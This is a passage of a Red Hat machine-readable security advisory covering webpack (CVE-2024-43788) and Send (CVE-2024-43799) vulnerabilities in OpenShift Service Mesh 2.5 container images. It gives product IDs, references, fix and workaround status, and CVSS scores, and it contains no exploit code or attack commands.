"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
